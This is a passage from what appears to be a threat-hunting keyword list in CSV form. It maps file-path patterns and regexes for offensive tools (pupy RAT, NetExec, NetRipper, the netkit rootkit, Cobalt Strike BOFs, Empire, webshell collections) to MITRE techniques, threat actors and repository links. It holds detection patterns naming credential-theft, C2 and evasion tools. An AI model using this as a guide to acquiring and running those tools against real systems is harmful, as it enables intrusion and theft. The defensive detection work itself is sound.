Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9083" "*/netbus-info.nse*",".{0,1000}\/netbus\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9084" "*/netbus-version.nse*",".{0,1000}\/netbus\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9085" "*/NetClone.exe*",".{0,1000}\/NetClone\.exe.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","9087" "*/netcreds.py*",".{0,1000}\/netcreds\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","9088" "*/netcreds.py*",".{0,1000}\/netcreds\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 
- T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","9089" "*/NetExec.git*",".{0,1000}\/NetExec\.git.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9090" "*/netexec.py*",".{0,1000}\/netexec\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9091" "*/NetExec-main*",".{0,1000}\/NetExec\-main.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9092" 
"*/Net-GPPPassword.exe*",".{0,1000}\/Net\-GPPPassword\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","9093" "*/Net-GPPPassword.git*",".{0,1000}\/Net\-GPPPassword\.git.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","N/A","10","2","172","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z","9094" "*/nethunter-images/*",".{0,1000}\/nethunter\-images\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","9095" "*/netkit.git*",".{0,1000}\/netkit\.git.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/Notselwyn/netkit","1","1","N/A","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","9096" "*/netkit/client/shell.py*",".{0,1000}\/netkit\/client\/shell\.py.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","1","N/A","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","9097" "*/netkit/src/netkit.*",".{0,1000}\/netkit\/src\/netkit\..{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","1","N/A","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","9098" "*/NetLoader.git*",".{0,1000}\/NetLoader\.git.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","N/A","10","9","820","147","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z","9099" "*/netntlm.pl*",".{0,1000}\/netntlm\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","9100" "*/NetNTLMtoSilverTicket*",".{0,1000}\/NetNTLMtoSilverTicket.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining 
NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","9101" "*/NetRipper.dll*",".{0,1000}\/NetRipper\.dll.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","1","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","9102" "*/NetRipper.exe*",".{0,1000}\/NetRipper\.exe.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","1","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","9103" "*/NetRipper.git*",".{0,1000}\/NetRipper\.git.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","1","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","9104" "*/NetRipper.x64.exe*",".{0,1000}\/NetRipper\.x64\.exe.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","1","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","9105" 
"*/NetRipper.x86.exe*",".{0,1000}\/NetRipper\.x86\.exe.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","1","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","9106" "*/NetRipperLog.txt*",".{0,1000}\/NetRipperLog\.txt.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#linux","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","9107" "*/NetSess.exe*",".{0,1000}\/NetSess\.exe.{0,1000}","offensive_tool_keyword","NetSess","Command line tool to enumerate NetBIOS sessions on a specified local or remote machine. ","T1016 - T1046 - T1087","TA0007 - TA0043","N/A","MUSTANG PANDA","Discovery","https://www.joeware.net/freetools/tools/netsess/","1","1","N/A","N/A","7","9","N/A","N/A","N/A","N/A","9114" "*/NetSess.zip*",".{0,1000}\/NetSess\.zip.{0,1000}","offensive_tool_keyword","NetSess","Command line tool to enumerate NetBIOS sessions on a specified local or remote machine. ","T1016 - T1046 - T1087","TA0007 - TA0043","N/A","MUSTANG PANDA","Discovery","https://www.joeware.net/freetools/tools/netsess/","1","1","N/A","N/A","7","9","N/A","N/A","N/A","N/A","9115" "*/NetshHelperBeacon.git*",".{0,1000}\/NetshHelperBeacon\.git.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. 
Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","1","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","9116" "*/netsparker.rb*",".{0,1000}\/netsparker\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9118" "*/netstat_windows.go*",".{0,1000}\/netstat_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - 
COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","9119" "*/nettitude/*",".{0,1000}\/nettitude\/.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9120" "*/nettitude/RunOF/*",".{0,1000}\/nettitude\/RunOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - 
Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","9121" "*/NetUser.cpp*",".{0,1000}\/NetUser\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - 
REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/lengjibo/NetUser","1","1","N/A","N/A","10","10","420","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z","9122" "*/NetUser.exe*",".{0,1000}\/NetUser\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/lengjibo/NetUser","1","1","N/A","N/A","10","10","420","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z","9123" "*/netuserenum/*",".{0,1000}\/netuserenum\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","9124" "*/netview.py*",".{0,1000}\/netview\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python 
classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","9125" "*/network/bloodhound3*",".{0,1000}\/network\/bloodhound3.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","9126" "*/Network/PortScan/*",".{0,1000}\/Network\/PortScan\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","N/A","10","10","635","57","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z","9127" "*/NetworkFileManagerPHP.php*",".{0,1000}\/NetworkFileManagerPHP\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9128" "*/NewPhish.ps1*",".{0,1000}\/NewPhish\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","9129" "*/nexpose-brute.nse*",".{0,1000}\/nexpose\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
